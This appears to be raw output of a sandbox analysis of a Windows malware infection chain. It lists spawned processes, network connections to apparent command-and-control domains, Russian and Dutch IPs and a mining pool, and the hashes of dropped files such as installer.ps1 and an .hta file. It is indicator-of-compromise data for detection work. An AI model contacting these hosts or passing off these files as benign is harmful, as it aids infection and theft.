"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4092 -childID 2 -isForBrowser -prefsHandle 4084 -prefMapHandle 4080 -prefsLen 32383 -prefMapSize 244628 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf9c54d7-c2d6-4610-affc-978c87b62edd} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4224 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4884 -prefMapHandle 4880 -prefsLen 32383 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cebe1feb-5ef3-4020-a479-6a52580b6948} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5312 -childID 3 -isForBrowser -prefsHandle 5296 -prefMapHandle 5304 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5accf423-98c0-444c-800e-ed14ca4b0c51} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5468 -childID 4 -isForBrowser -prefsHandle 5424 -prefMapHandle 5324 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dc5080e6-9ef4-4303-b2b8-56c721da26ab} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5660 -childID 5 -isForBrowser -prefsHandle 5616 -prefMapHandle 5428 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {54817f4f-d0e9-4663-8819-257164c54489} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab
C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe
"C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe"
C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\10107560101\ktxzLhN.exe
"C:\Users\Admin\AppData\Local\Temp\10107560101\ktxzLhN.exe"
C:\Users\Admin\AppData\Local\Temp\dll32.exe
"C:\Users\Admin\AppData\Local\Temp\dll32.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 1940"
C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe
"C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | moderzysics.top | udp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| NL | 45.144.212.77:16000 | 45.144.212.77 | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
| LU | 45.59.120.8:80 | 45.59.120.8 | tcp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| DE | 192.248.189.11:443 | pool.hashvault.pro | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| NL | 45.154.98.175:6969 | tcp | |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | exarthynature.run | udp |
| US | 104.21.96.1:443 | exarthynature.run | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 104.21.96.1:443 | exarthynature.run | tcp |
| US | 104.21.96.1:443 | exarthynature.run | tcp |
| US | 104.21.96.1:443 | exarthynature.run | tcp |
| US | 104.21.96.1:443 | exarthynature.run | tcp |
| US | 104.21.96.1:443 | exarthynature.run | tcp |
| US | 104.21.96.1:443 | exarthynature.run | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 8.8.8.8:53 | collapimga.fun | udp |
| US | 8.8.8.8:53 | seizedsentec.online | udp |
| US | 8.8.8.8:53 | strawpeasaen.fun | udp |
| US | 8.8.8.8:53 | quietswtreams.life | udp |
| US | 8.8.8.8:53 | starrynsightsky.icu | udp |
| US | 8.8.8.8:53 | earthsymphzony.today | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.124.170.33:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | farmingtzricks.top | udp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 8.8.8.8:53 | croprojegies.run | udp |
| US | 104.21.16.1:443 | croprojegies.run | tcp |
| US | 104.21.16.1:443 | croprojegies.run | tcp |
| US | 104.21.16.1:443 | croprojegies.run | tcp |
| US | 104.21.16.1:443 | croprojegies.run | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 104.21.16.1:443 | croprojegies.run | tcp |
| US | 104.21.16.1:443 | croprojegies.run | tcp |
| US | 104.21.16.1:443 | croprojegies.run | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 45.93.20.28:80 | 45.93.20.28 | tcp |
| N/A | 127.0.0.1:9222 | tcp | |
| N/A | 127.0.0.1:9222 | tcp | |
| N/A | 127.0.0.1:50649 | tcp | |
| N/A | 127.0.0.1:50658 | tcp | |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | youtube.com | udp |
| GB | 142.250.187.206:443 | youtube.com | tcp |
| GB | 142.250.187.206:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | tcp |
| GB | 142.250.187.206:443 | youtube.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| GB | 172.217.16.238:443 | youtube-ui.l.google.com | tcp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| GB | 172.217.16.238:443 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| GB | 216.58.213.14:443 | consent.youtube.com | tcp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| GB | 216.58.213.14:443 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 34.107.152.202:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | tracking-protection.cdn.mozilla.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | tracking-protection.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | tracking-protection.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | tracking-protection.cdn.mozilla.net | udp |
| GB | 216.58.204.68:443 | www.google.com | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | tracking-protection.cdn.mozilla.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | tracking-protection.cdn.mozilla.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| NL | 2.18.121.79:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 172.217.16.238:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 172.217.16.238:443 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | r2---sn-aigl6ns6.gvt1.com | udp |
| GB | 74.125.105.7:443 | r2---sn-aigl6ns6.gvt1.com | tcp |
| US | 8.8.8.8:53 | r2.sn-aigl6ns6.gvt1.com | udp |
| US | 8.8.8.8:53 | r2.sn-aigl6ns6.gvt1.com | udp |
| GB | 74.125.105.7:443 | r2.sn-aigl6ns6.gvt1.com | udp |
Files
memory/1664-0-0x0000000000B80000-0x0000000000E8F000-memory.dmp
memory/1664-1-0x0000000077774000-0x0000000077776000-memory.dmp
memory/1664-2-0x0000000000B81000-0x0000000000BE1000-memory.dmp
memory/1664-3-0x0000000000B80000-0x0000000000E8F000-memory.dmp
memory/1664-4-0x0000000000B80000-0x0000000000E8F000-memory.dmp
memory/1664-5-0x0000000000B80000-0x0000000000E8F000-memory.dmp
memory/1664-6-0x0000000000B80000-0x0000000000E8F000-memory.dmp
memory/1664-7-0x0000000000B80000-0x0000000000E8F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe
| MD5 | f42f59d1a7bc1d3fcd51d41a76974175 |
| SHA1 | 08591f2269d3d8c8099beaa0f4676ae8b0f7bb1c |
| SHA256 | ad14a834ed7d0994d38ec0374f26f4837e94fe5b54d15442c5b2fb796365dc38 |
| SHA512 | 38c5cc4567b19c637b58874dd408d5994c168f071962d7008889b9e360667301107a9efd7e1ee326e53bddbec5f536d562d91c7170761127f568d3175544eaae |
memory/1664-15-0x0000000000B80000-0x0000000000E8F000-memory.dmp
memory/1660-13-0x0000000000090000-0x000000000054D000-memory.dmp
memory/1664-11-0x0000000000B81000-0x0000000000BE1000-memory.dmp
memory/1660-16-0x0000000000091000-0x00000000000BF000-memory.dmp
memory/1660-17-0x0000000000090000-0x000000000054D000-memory.dmp
memory/1660-18-0x0000000000090000-0x000000000054D000-memory.dmp
memory/1660-32-0x0000000000090000-0x000000000054D000-memory.dmp
memory/2668-30-0x0000000000E10000-0x00000000012CD000-memory.dmp
memory/2668-33-0x0000000000E11000-0x0000000000E3F000-memory.dmp
memory/2668-34-0x0000000000E10000-0x00000000012CD000-memory.dmp
memory/2668-35-0x0000000000E10000-0x00000000012CD000-memory.dmp
memory/2668-36-0x0000000000E10000-0x00000000012CD000-memory.dmp
memory/2668-37-0x0000000000E10000-0x00000000012CD000-memory.dmp
memory/2668-38-0x0000000000E10000-0x00000000012CD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
| MD5 | 5b3ed060facb9d57d8d0539084686870 |
| SHA1 | 9cae8c44e44605d02902c29519ea4700b4906c76 |
| SHA256 | 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207 |
| SHA512 | 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a |
memory/2668-54-0x0000000000E10000-0x00000000012CD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5995.tmp\5996.tmp\5997.bat
| MD5 | 3895cb9413357f87a88c047ae0d0bd40 |
| SHA1 | 227404dd0f7d7d3ea9601eecd705effe052a6c91 |
| SHA256 | 8140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785 |
| SHA512 | a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1 |
memory/5036-56-0x0000029BA6BF0000-0x0000029BA6C12000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0t0q1sa0.5gm.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2668-66-0x0000000000E10000-0x00000000012CD000-memory.dmp
memory/2668-67-0x0000000000E10000-0x00000000012CD000-memory.dmp
memory/2668-68-0x0000000000E10000-0x00000000012CD000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 556084f2c6d459c116a69d6fedcc4105 |
| SHA1 | 633e89b9a1e77942d822d14de6708430a3944dbc |
| SHA256 | 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8 |
| SHA512 | 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | de6aa76f93d4b52a199d3c98d970e110 |
| SHA1 | 04ddc85a8c120fecab8623fe4138a508928d08db |
| SHA256 | ddcd2e80e82a9efc63f8a8bac854e8e4f942c7bd4b49266cf8f4be13883294b2 |
| SHA512 | 43a0aaf20d756287f0fcb0d00de557b18b1f1127a8feebaf9ccb55218c7dcc484d06494f5015855fcdb72da9b34cb77e2e8792bf57afc2a3cd7eeefa5c6bb74c |
C:\Users\Admin\AppData\Local\Temp\installer.ps1
| MD5 | b6d611af4bea8eaaa639bbf024eb0e2d |
| SHA1 | 0b1205546fd80407d85c9bfbed5ff69d00645744 |
| SHA256 | 8cd3bf95cedcf3469d0044976c66cbf22cd2fecf21ae4f94986d7211d6ba9a2b |
| SHA512 | d8a4ec5bd986884959db3edfd48e2bf4c70ead436f81eab73b104aa0ff0f5dadfb6227cb2dab1f979f0dbb3aafbc1889ed571fb6e9444a09ae984b789314463d |
\??\c:\Users\Admin\AppData\Local\Temp\5muhcagw\5muhcagw.cmdline
| MD5 | fae76bd3065d61a21e86cbb920f08bea |
| SHA1 | db6c2c5f13f6a1ba52ff4771865d40d022f8f3d8 |
| SHA256 | eb75175c09cb51b0325801a5bbc45c7c38d4f26454b4ff960854f1d9d4b7e6c5 |
| SHA512 | 3404a386c444a478c86a128fd6487c4a1bd5324d4cb687b79bd4147a0817e8a1c9a0cd17c9eb7b08beaa504a79b8ac4f7cbe6535d907f577cc554365fa2aff65 |
\??\c:\Users\Admin\AppData\Local\Temp\5muhcagw\5muhcagw.0.cs
| MD5 | 1809fe3ba081f587330273428ec09c9c |
| SHA1 | d24ea2ea868ae49f46c8a7d894b7fda255ec1cd9 |
| SHA256 | d07a0c5fdf0862325608791f92273e0fc411c294f94d757f1ff0303ba5e03457 |
| SHA512 | e662420fc93a5cefd657f7701432924e6a06482ea147ad814d5e20b16b2f3c13ed2cc6b9caf24c22b7a5b24ad0aa1d216c5804c46d2250522cfc2cadc69f9e28 |
\??\c:\Users\Admin\AppData\Local\Temp\5muhcagw\CSCE2143F3F87124EFFBE7090E7EC1FD14.TMP
| MD5 | d110bbffa2130161b0ab32577d1e6ac8 |
| SHA1 | f842eff29345803e4b1a7a6f36a17128145b2d13 |
| SHA256 | ca608c743a476787fafbf5c39a4fbdbdcc4befe9fd42286eae80a77a2d6790af |
| SHA512 | 66885a480ac808f01691984a90629a7abcba53dce5e2b39adeee039677cd43b4a42173a0f492fbd8e1d7f05489b7c25bd64589c1f20ac35fa8a2a59107487165 |
C:\Users\Admin\AppData\Local\Temp\RESAB10.tmp
| MD5 | b4fcaed393b5d224264acb65043cda3b |
| SHA1 | 2d5812504ed5b2b079274cbbb082de42f1f11883 |
| SHA256 | 3c2723d3f6dabecf3bd3d6d4c2592894d9b67dd5f1597173d53e85b8b9ba8202 |
| SHA512 | a8ae074e6697cb48583aec7997973628daf2d92892421b2f63304377e7f12a075c90bd1a85921d46751541cc4a2f3197fa64f709172564d31210666f33ac26c9 |
memory/116-98-0x000001F064340000-0x000001F064348000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5muhcagw\5muhcagw.dll
| MD5 | 5fda57446782824f5c91ee670d8d1358 |
| SHA1 | 076ec4ce7533a650e70a668a6ba47c8d002cab47 |
| SHA256 | 6eab8972fcb1cb586a27fca93c94864e98a9a430d65f4a1dc9e0a184d1fa3da7 |
| SHA512 | 8a00cd8fd3941a349b13838cb9033644f9ca5afe9fd89428a91a7755e94ab8b9bbba08edd22c27c1a867962dbad1ac00ecff0e0f2a07928232c2e5d565d48f50 |
memory/2996-96-0x0000000000E10000-0x00000000012CD000-memory.dmp
memory/3432-100-0x000000000E580000-0x000000000EE03000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe
| MD5 | 35a4dfb5f0308d20b1e5bf26e0a70509 |
| SHA1 | 0c72b35b74dadbce4a95c034968913de271aae06 |
| SHA256 | 40d3baeb6df3e2cd4eed207e773b21989b86ef547de12a748529c2b559025339 |
| SHA512 | 51b8bf5583a256015daaa8caa9c9868c792ef4a1157b89a6880b365c4c5a1c7416abc2b1fcdde9d1d5d9bb7aaa1c617d5b34124a582ec042ac5a2afa064c60d9 |
memory/2996-126-0x0000000000E10000-0x00000000012CD000-memory.dmp
memory/2036-125-0x0000000000700000-0x0000000001614000-memory.dmp
memory/2668-127-0x0000000000E10000-0x00000000012CD000-memory.dmp
memory/2036-128-0x000000001C360000-0x000000001CEC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\dll32.exe
| MD5 | ffb5c5f8bab4598fada3bbf92d02d66d |
| SHA1 | ae8096c1f160c97874179ea878a61f69bfb9941a |
| SHA256 | f3aa764be17f1a197f94b949cfd88f99c2d67e9fec1f53046ef1b6189f594da1 |
| SHA512 | 902e8a95b964ef3a48504dcdb3c4f0615212eb942476ec26b88e02a39cbaaf866f3fcbe5cd4374342b80aae9a7e17092a28dbe1d53630493a0b0cee8152a4ccf |
memory/4264-140-0x0000029995B90000-0x0000029995B9A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Costura\05A92EC28EDC5561548638CAA951F864\64\sqlite.interop.dll
| MD5 | 65ccd6ecb99899083d43f7c24eb8f869 |
| SHA1 | 27037a9470cc5ed177c0b6688495f3a51996a023 |
| SHA256 | aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4 |
| SHA512 | 533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d |
memory/4264-141-0x0000029997590000-0x0000029997606000-memory.dmp
memory/4264-135-0x00000299951B0000-0x0000029995766000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
| MD5 | 73636685f823d103c54b30bc457c7f0d |
| SHA1 | 597dba03dce00cf6d30b082c80c8f9108ae90ccf |
| SHA256 | 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c |
| SHA512 | 183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7 |
memory/2668-167-0x0000000000E10000-0x00000000012CD000-memory.dmp
C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe
| MD5 | 1dc908064451d5d79018241cea28bc2f |
| SHA1 | f0d9a7d23603e9dd3974ab15400f5ad3938d657a |
| SHA256 | d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454 |
| SHA512 | 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f |
memory/2256-182-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe
| MD5 | 745e4bcf3d176ea5e82a7c26a6733757 |
| SHA1 | 499cf0a28c9469faabae1e0f998c6a9b3e82862f |
| SHA256 | 8af6936111d0ba881e34ec715d1383dc90c017cd5ca3f51f1d69dc02c0aa2c63 |
| SHA512 | bd3fe79f49b060ae01766ca3e424a466c5ca652863a00fd23109e177bc7f6b2856eb513ea18ebbf5c3bee8820f817c50fadda44e12fe79656fbe6bb811aba69d |
memory/3236-199-0x0000000000EC0000-0x00000000011C9000-memory.dmp
memory/1940-200-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp
memory/1940-201-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp
memory/1940-209-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp
memory/1940-210-0x0000028DDD7B0000-0x0000028DDD7D0000-memory.dmp
memory/1940-213-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp
memory/1940-214-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp
memory/1940-215-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp
memory/1940-211-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp
memory/1940-212-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
| MD5 | 47177b7fbf1ce282fb87da80fd264b3f |
| SHA1 | d07d2f9624404fa882eb94ee108f222d76bbbd4c |
| SHA256 | e3a190fc0f3e2be612c896ad1bda174271ee57d493f1b39030de1cbb5b7090eb |
| SHA512 | 059db11d303355b85e94031a54b0e6bac30bc9e2475bf3fceb9c01063af6f593d455fb54f8893ca37a150b598a9863b04f37056ef589656a6e83da719b330db9 |
memory/4360-233-0x00000000004E0000-0x00000000004F0000-memory.dmp
memory/2668-234-0x0000000000E10000-0x00000000012CD000-memory.dmp
memory/1940-235-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp
memory/2256-237-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2256-236-0x0000000000400000-0x0000000000840000-memory.dmp
memory/3236-239-0x0000000000EC0000-0x00000000011C9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe
| MD5 | 8a632abe880092fb8fe1d3c882c417a5 |
| SHA1 | d3773cc8e6dc6dcd757a5cbc3269b435885fbbf4 |
| SHA256 | 7f37d73657533b0e599dfac9fb0267c3e38342f1aeb475e3b72421440c95ece7 |
| SHA512 | 3f9238f924e2cf022bd4d9c9c151b85055cd969561304de47baec945754e4e7b63e00a5ec7cfb2344d9c71c4a75e9a0d7f0c4fa16a0707cef87619240e63c196 |
C:\Users\Admin\AppData\Local\Temp\kAxSdUV2p.hta
| MD5 | 87a4fdd840e9a650df04bd645b571381 |
| SHA1 | 9d896ce31ad9643d1a114642f993b1225f553121 |
| SHA256 | 0b8bf150abca1992a04c8403f1ca8910d4d4a7ccea59cdce48d5913a76f2c618 |
| SHA512 | f6064b5fbcb05940d0d02f87a3a2bf2de88a4a1f46dc9aa2c62dc392ea82bf9f139c6bc2a64fab73c08ac0764bbb7413b8e5f5674f4327f2e06c7033e4352500 |
memory/4624-263-0x0000000004530000-0x0000000004566000-memory.dmp
memory/4624-264-0x0000000004C40000-0x0000000005268000-memory.dmp
memory/4624-265-0x0000000005270000-0x0000000005292000-memory.dmp
memory/4624-267-0x00000000054F0000-0x0000000005556000-memory.dmp
memory/4624-266-0x0000000005410000-0x0000000005476000-memory.dmp
memory/4624-277-0x0000000005560000-0x00000000058B4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 212ec0c97c5a5624609ffac0e67191f2 |
| SHA1 | 646b82fa58e01a7dee9c21628a2f059facfee60a |
| SHA256 | 137682dd769077c7e6ab64d7da1a397ef4521cc2310887e0b5fc9c63856fea6b |
| SHA512 | 590c33bcffc8924d31311422a0dbc5aaefa821d7382d524c7ee2e0a92c9663d2259d0008218103305dd38657e6bf29ec6bf146c241d32be20daea53f6edaff6d |
memory/4624-279-0x0000000005B00000-0x0000000005B1E000-memory.dmp
memory/4624-280-0x00000000060B0000-0x00000000060FC000-memory.dmp
